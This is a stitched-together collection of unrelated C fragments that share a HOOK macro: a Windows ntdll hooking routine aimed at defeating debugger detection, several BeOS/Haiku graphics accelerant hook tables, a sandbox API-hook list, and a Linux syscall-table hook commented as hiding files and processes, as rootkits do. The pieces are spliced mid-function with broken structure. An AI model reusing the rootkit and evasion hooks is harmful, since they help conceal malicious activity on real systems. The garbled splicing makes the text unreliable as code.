void ApplyNtdllHook(HOOK_DLL_EXCHANGE * dllexchange, HANDLE hProcess, BYTE * dllMemory, DWORD_PTR imageBase)
{
hNtdll = GetModuleHandleW(L"ntdll.dll");
#ifndef _WIN64
countNativeHooks = 0;
onceNativeCallContinue = false;
HookNative = dllexchange->HookNative;
#endif
void * HookedNtSetInformationThread = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtSetInformationThread") + imageBase);
void * HookedNtQuerySystemInformation = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtQuerySystemInformation") + imageBase);
void * HookedNtQueryInformationProcess = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtQueryInformationProcess") + imageBase);
void * HookedNtSetInformationProcess = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtSetInformationProcess") + imageBase);
void * HookedNtQueryObject = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtQueryObject") + imageBase);
void * HookedNtYieldExecution = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtYieldExecution") + imageBase);
void * HookedNtGetContextThread = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtGetContextThread") + imageBase);
void * HookedNtSetContextThread = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtSetContextThread") + imageBase);
void * HookedKiUserExceptionDispatcher = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedKiUserExceptionDispatcher") + imageBase);
void * HookedNtContinue = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtContinue") + imageBase);
void * HookedNtClose = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtClose") + imageBase);
void * HookedNtSetDebugFilterState = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtSetDebugFilterState") + imageBase);
void * HookedNtCreateThread = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtCreateThread") + imageBase);
void * HookedNtCreateThreadEx = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtCreateThreadEx") + imageBase);
void * HookedNtQuerySystemTime = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtQuerySystemTime") + imageBase);
void * HookedNtQueryPerformanceCounter = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtQueryPerformanceCounter") + imageBase);
void * HookedNtResumeThread = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtResumeThread") + imageBase);
HookedNativeCallInternal = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNativeCallInternal") + imageBase);
_NtSetInformationThread = (t_NtSetInformationThread)GetProcAddress(hNtdll, "NtSetInformationThread");
_NtQuerySystemInformation = (t_NtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
_NtQueryInformationProcess = (t_NtQueryInformationProcess)GetProcAddress(hNtdll, "NtQueryInformationProcess");
_NtSetInformationProcess = (t_NtSetInformationProcess)GetProcAddress(hNtdll, "NtSetInformationProcess");
_NtQueryObject = (t_NtQueryObject)GetProcAddress(hNtdll, "NtQueryObject");
_NtYieldExecution = (t_NtYieldExecution)GetProcAddress(hNtdll, "NtYieldExecution");
_NtGetContextThread = (t_NtGetContextThread)GetProcAddress(hNtdll, "NtGetContextThread");
_NtSetContextThread = (t_NtSetContextThread)GetProcAddress(hNtdll, "NtSetContextThread");
_KiUserExceptionDispatcher = (t_KiUserExceptionDispatcher)GetProcAddress(hNtdll, "KiUserExceptionDispatcher");
_NtContinue = (t_NtContinue)GetProcAddress(hNtdll, "NtContinue");
_NtClose = (t_NtClose)GetProcAddress(hNtdll, "NtClose");
_NtSetDebugFilterState = (t_NtSetDebugFilterState)GetProcAddress(hNtdll, "NtSetDebugFilterState");
_NtCreateThread = (t_NtCreateThread)GetProcAddress(hNtdll, "NtCreateThread");
_NtCreateThreadEx = (t_NtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
_NtQuerySystemTime = (t_NtQuerySystemTime)GetProcAddress(hNtdll, "NtQuerySystemTime");
_NtQueryPerformanceCounter = (t_NtQueryPerformanceCounter)GetProcAddress(hNtdll, "NtQueryPerformanceCounter");
_NtResumeThread = (t_NtResumeThread)GetProcAddress(hNtdll, "NtResumeThread");
if (dllexchange->EnableNtSetInformationThreadHook == TRUE) HOOK_NATIVE(NtSetInformationThread);
if (dllexchange->EnableNtQuerySystemInformationHook == TRUE) HOOK_NATIVE(NtQuerySystemInformation);
if (dllexchange->EnableNtQueryInformationProcessHook == TRUE) HOOK_NATIVE(NtQueryInformationProcess);
if (dllexchange->EnableNtSetInformationProcessHook == TRUE) HOOK_NATIVE(NtSetInformationProcess);
if (dllexchange->EnableNtQueryObjectHook == TRUE) HOOK_NATIVE(NtQueryObject);
if (dllexchange->EnableNtYieldExecutionHook == TRUE) HOOK_NATIVE(NtYieldExecution);
if (dllexchange->EnableNtGetContextThreadHook == TRUE) HOOK_NATIVE(NtGetContextThread);
if (dllexchange->EnableNtSetContextThreadHook == TRUE) HOOK_NATIVE(NtSetContextThread);
if (dllexchange->EnableNtCloseHook == TRUE) HOOK_NATIVE(NtClose);
if (dllexchange->EnablePreventThreadCreation == TRUE) HOOK_NATIVE(NtCreateThread);
if (((dllexchange->EnablePreventThreadCreation == TRUE) || (dllexchange->EnableNtCreateThreadExHook == TRUE)) && _NtCreateThreadEx != 0) HOOK_NATIVE(NtCreateThreadEx);
if (dllexchange->EnableNtSetDebugFilterStateHook == TRUE) HOOK_NATIVE_NOTRAMP(NtSetDebugFilterState);
#ifndef _WIN64
if (dllexchange->EnableKiUserExceptionDispatcherHook == TRUE) HOOK(KiUserExceptionDispatcher);
if (dllexchange->EnableNtContinueHook == TRUE) HOOK_NATIVE(NtContinue);
#endif
if (dllexchange->EnableNtQuerySystemTimeHook == TRUE && _NtQuerySystemTime != 0) HOOK_NATIVE(NtQuerySystemTime);
if (dllexchange->EnableNtQueryPerformanceCounterHook == TRUE) HOOK_NATIVE(NtQueryPerformanceCounter);
if (dllexchange->EnableMalwareRunPeUnpacker == TRUE) HOOK_NATIVE(NtResumeThread);
dllexchange->isNtdllHooked = TRUE;
#ifndef _WIN64
dllexchange->NativeCallContinue = NativeCallContinue;
#endif
}
void * get_accelerant_hook(uint32 feature, void *data)
{
switch (feature)
{
/*
One of either B_INIT_ACCELERANT or B_CLONE_ACCELERANT will be requested and
subsequently called before any other hook is requested. All other feature
hook selections can be predicated on variables assigned during the accelerant
initialization process.
*/
/* initialization */
HOOK(INIT_ACCELERANT);
HOOK(CLONE_ACCELERANT);
HOOK(ACCELERANT_CLONE_INFO_SIZE);
HOOK(GET_ACCELERANT_CLONE_INFO);
HOOK(UNINIT_ACCELERANT);
HOOK(GET_ACCELERANT_DEVICE_INFO);
HOOK(ACCELERANT_RETRACE_SEMAPHORE);
/* mode configuration */
HOOK(ACCELERANT_MODE_COUNT);
HOOK(GET_MODE_LIST);
HOOK(PROPOSE_DISPLAY_MODE);
HOOK(SET_DISPLAY_MODE);
HOOK(GET_DISPLAY_MODE);
HOOK(GET_FRAME_BUFFER_CONFIG);
HOOK(GET_PIXEL_CLOCK_LIMITS);
HOOK(MOVE_DISPLAY);
HOOK(SET_INDEXED_COLORS);
HOOK(GET_TIMING_CONSTRAINTS);
HOOK(DPMS_CAPABILITIES);
HOOK(DPMS_MODE);
HOOK(SET_DPMS_MODE);
/* cursor managment */
HRDC(SET_CURSOR_SHAPE);
HRDC(MOVE_CURSOR);
HRDC(SHOW_CURSOR);
/* synchronization */
HOOK(ACCELERANT_ENGINE_COUNT);
HOOK(ACQUIRE_ENGINE);
HOOK(RELEASE_ENGINE);
HOOK(WAIT_ENGINE_IDLE);
HOOK(GET_SYNC_TOKEN);
HOOK(SYNC_TO_TOKEN);
/*
Depending on the engine architecture, you may choose to provide a different
function to be used with each bit-depth for example.
Note: These hooks are re-acquired by the app_server after each mode switch.
*/
/* only export video overlay functions if card is capable of it */
CHKO(OVERLAY_COUNT);
CHKO(OVERLAY_SUPPORTED_SPACES);
CHKO(OVERLAY_SUPPORTED_FEATURES);
CHKO(ALLOCATE_OVERLAY_BUFFER);
CHKO(RELEASE_OVERLAY_BUFFER);
CHKO(GET_OVERLAY_CONSTRAINTS);
CHKO(ALLOCATE_OVERLAY);
CHKO(RELEASE_OVERLAY);
CHKO(CONFIGURE_OVERLAY);
/*
When requesting an acceleration hook, the calling application provides a
pointer to the display_mode for which the acceleration function will be used.
Depending on the engine architecture, you may choose to provide a different
function to be used with each bit-depth. In the sample driver we return
the same function all the time.
Note: These hooks are re-acquired by the app_server after each mode switch.
*/
/* only export 2D acceleration functions in modes that are capable of it */
/* used by the app_server and applications (BWindowScreen) */
CHKA(SCREEN_TO_SCREEN_BLIT);
CHKA(FILL_RECTANGLE);
CHKA(INVERT_RECTANGLE);
CHKA(FILL_SPAN);
/* not (yet) used by the app_server:
* so just for application use (BWindowScreen) */
// CHKA(SCREEN_TO_SCREEN_TRANSPARENT_BLIT);
// CHKA(SCREEN_TO_SCREEN_SCALED_FILTERED_BLIT;
}
/* Return a null pointer for any feature we don't understand. */
return 0;
}
/*
* The standard entry point. Given a uint32 feature identifier, this routine
* returns a pointer to the function that implements the feature. Some features
* require more information than just the identifier to select the proper
* function. The extra information (which is specific to the feature) is
* pointed at by the void *data parameter. By default, no extra information
* is available. Any extra information available to choose the function will
* be noted on a case by case below.
*/
void *get_accelerant_hook(uint32 feature, void *data) {
/* These definition is out of pure lazyness.*/
#define HOOK(x) case B_##x: return (void *)x
switch (feature) {
/*
* One of either B_INIT_ACCELERANT or B_CLONE_ACCELERANT will be
* requested and subsequently called before any other hook is
* requested. All other feature hook selections can be predicated
* on variables assigned during the accelerant initialization process.
*/
/* initialization */
HOOK(INIT_ACCELERANT);
HOOK(CLONE_ACCELERANT);
HOOK(ACCELERANT_CLONE_INFO_SIZE);
HOOK(GET_ACCELERANT_CLONE_INFO);
HOOK(UNINIT_ACCELERANT);
HOOK(GET_ACCELERANT_DEVICE_INFO);
/// HOOK(ACCELERANT_RETRACE_SEMAPHORE); /* Not implemented. Would be useful to have it implemented. */
/* mode configuration */
HOOK(ACCELERANT_MODE_COUNT);
HOOK(GET_MODE_LIST);
/// HOOK(PROPOSE_DISPLAY_MODE);
HOOK(SET_DISPLAY_MODE);
HOOK(GET_DISPLAY_MODE);
HOOK(GET_FRAME_BUFFER_CONFIG);
HOOK(GET_PIXEL_CLOCK_LIMITS);
/* synchronization */
HOOK(ACCELERANT_ENGINE_COUNT);
HOOK(ACQUIRE_ENGINE);
HOOK(RELEASE_ENGINE);
HOOK(WAIT_ENGINE_IDLE);
HOOK(GET_SYNC_TOKEN);
HOOK(SYNC_TO_TOKEN);
/* 2D acceleration */
HOOK(SCREEN_TO_SCREEN_BLIT);
HOOK(FILL_RECTANGLE);
}
/* Return a null pointer for any feature we don't understand. */
return 0;
#undef HOOK
}
// (whereas the "normal" hooks, those with allow_hook_recursion set to
// zero, do) we have to hook the "special" hooks first. Otherwise the
// execution flow will end up in an infinite loop, because of hook count
// and whatnot.
//
// In other words, do *NOT* place "special" hooks behind "normal" hooks.
//
HOOK2(ntdll, LdrLoadDll, TRUE),
HOOK2(kernel32, CreateProcessInternalW, TRUE),
//
// File Hooks
//
HOOK(ntdll, NtCreateFile),
HOOK(ntdll, NtOpenFile),
HOOK(ntdll, NtReadFile),
HOOK(ntdll, NtWriteFile),
HOOK(ntdll, NtDeleteFile),
HOOK(ntdll, NtDeviceIoControlFile),
HOOK(ntdll, NtQueryDirectoryFile),
HOOK(ntdll, NtQueryInformationFile),
HOOK(ntdll, NtSetInformationFile),
HOOK(ntdll, NtOpenDirectoryObject),
HOOK(ntdll, NtCreateDirectoryObject),
// CreateDirectoryExA calls CreateDirectoryExW
// CreateDirectoryW does not call CreateDirectoryExW
HOOK(kernel32, CreateDirectoryW),
HOOK(kernel32, CreateDirectoryExW),
/*
The standard entry point. Given a uint32 feature identifier, this routine
returns a pointer to the function that implements the feature. Some features
require more information than just the identifier to select the proper
function. The extra information (which is specific to the feature) is
pointed at by the void *data parameter. By default, no extra information
is available. Any extra information available to choose the function will be
noted on a case by case below.
*/
void *
get_accelerant_hook(uint32 feature, void *data)
{
(void)data;
switch (feature) {
/*
These definitions are out of pure lazyness.
*/
#define HOOK(x) case B_##x: return (void *)x
#define ZERO(x) case B_##x: return (void *)0
/*
One of either B_INIT_ACCELERANT or B_CLONE_ACCELERANT will be requested and
subsequently called before any other hook is requested. All other feature
hook selections can be predicated on variables assigned during the accelerant
initialization process.
*/
/* initialization */
HOOK(INIT_ACCELERANT);
HOOK(CLONE_ACCELERANT);
HOOK(ACCELERANT_CLONE_INFO_SIZE);
HOOK(GET_ACCELERANT_CLONE_INFO);
HOOK(UNINIT_ACCELERANT);
HOOK(GET_ACCELERANT_DEVICE_INFO);
HOOK(ACCELERANT_RETRACE_SEMAPHORE);
/* mode configuration */
HOOK(ACCELERANT_MODE_COUNT);
HOOK(GET_MODE_LIST);
HOOK(PROPOSE_DISPLAY_MODE);
HOOK(SET_DISPLAY_MODE);
HOOK(GET_DISPLAY_MODE);
HOOK(GET_FRAME_BUFFER_CONFIG);
HOOK(GET_PIXEL_CLOCK_LIMITS);
HOOK(MOVE_DISPLAY);
HOOK(SET_INDEXED_COLORS);
//HOOK(GET_TIMING_CONSTRAINTS);
#ifdef __ANTARES__
case B_GET_PREFERRED_DISPLAY_MODE:
return (void*)radeon_get_preferred_display_mode;
case B_GET_EDID_INFO:
return (void*)radeon_get_edid_info;
#endif
HOOK(DPMS_CAPABILITIES);
HOOK(DPMS_MODE);
HOOK(SET_DPMS_MODE);
/* cursor managment */
HOOK(SET_CURSOR_SHAPE);
HOOK(MOVE_CURSOR);
HOOK(SHOW_CURSOR);
/* synchronization */
HOOK(ACCELERANT_ENGINE_COUNT);
HOOK(ACQUIRE_ENGINE);
HOOK(RELEASE_ENGINE);
HOOK(WAIT_ENGINE_IDLE);
HOOK(GET_SYNC_TOKEN);
HOOK(SYNC_TO_TOKEN);
/*
When requesting an acceleration hook, the calling application provides a
pointer to the display_mode for which the acceleration function will be used.
Depending on the engine architecture, you may choose to provide a different
function to be used with each bit-depth. In the sample driver we return
the same function all the time.
*/
/* 2D acceleration */
HOOK(SCREEN_TO_SCREEN_BLIT);
HOOK(FILL_RECTANGLE);
HOOK(INVERT_RECTANGLE);
HOOK(FILL_SPAN);
// overlay
HOOK(OVERLAY_COUNT);
HOOK(OVERLAY_SUPPORTED_SPACES);
HOOK(OVERLAY_SUPPORTED_FEATURES);
HOOK(ALLOCATE_OVERLAY_BUFFER);
HOOK(RELEASE_OVERLAY_BUFFER);
HOOK(GET_OVERLAY_CONSTRAINTS);
HOOK(ALLOCATE_OVERLAY);
HOOK(RELEASE_OVERLAY);
HOOK(CONFIGURE_OVERLAY);
#undef HOOK
#undef ZERO
}
return NULL;
}
int hook_sys_call_table(void)
{
anima_memcpy(fake_sct, (void *)ksyms.sys_call_table, sizeof(fake_sct));
HOOK(uname, new_sys_newuname);
/* hide files */
HOOK(open, new_sys_open);
HOOK(chdir, new_sys_chdir);
HOOK(stat, new_sys_stat);
HOOK(lstat, new_sys_lstat);
//HOOK(newfstatat, new_sys_fstatat);
HOOK(getdents, new_sys_getdents);
HOOK(getdents64, new_sys_getdents64);
HOOK(execve, new_sys_execve);
/* hide process */
HOOK(getpgid, new_sys_getpgid);
HOOK(getsid, new_sys_getsid);
HOOK(setpgid, new_sys_setpgid);
HOOK(getpriority, new_sys_getpriority);
HOOK(kill, new_sys_kill);
HOOK(sched_setscheduler, new_sys_sched_setscheduler);
HOOK(sched_setparam, new_sys_sched_setparam);
HOOK(sched_getscheduler, new_sys_sched_getscheduler);
HOOK(sched_getparam, new_sys_sched_getparam);
HOOK(sched_setaffinity, new_sys_sched_setaffinity);
HOOK(sched_getaffinity, new_sys_sched_getaffinity);
HOOK(sched_rr_get_interval, new_sys_sched_rr_get_interval);
HOOK(wait4, new_sys_wait4);
HOOK(waitid, new_sys_waitid);
HOOK(rt_tgsigqueueinfo, new_sys_rt_tgsigqueueinfo);
HOOK(rt_sigqueueinfo, new_sys_rt_sigqueueinfo);
HOOK(prlimit64, new_sys_prlimit64);
HOOK(ptrace, new_sys_ptrace);
#if ARCH_X86
HOOK(migrate_pages, new_sys_migrate_pages);
#endif
HOOK(move_pages, new_sys_move_pages);
HOOK(get_robust_list, new_sys_get_robust_list);
HOOK(perf_event_open, new_sys_perf_event_open);
HOOK(exit, new_sys_exit);
HOOK(exit_group, new_sys_exit_group);
HOOK(reboot, new_sys_reboot);
/* architecture specific */
#if ARCH_X86
x86_hw_breakpoint_register(0, ksyms.sys_call_table_call,
DR_RW_EXECUTE, 0, system_call_hook);
#elif ARCH_ARM
#endif
return 0;
}
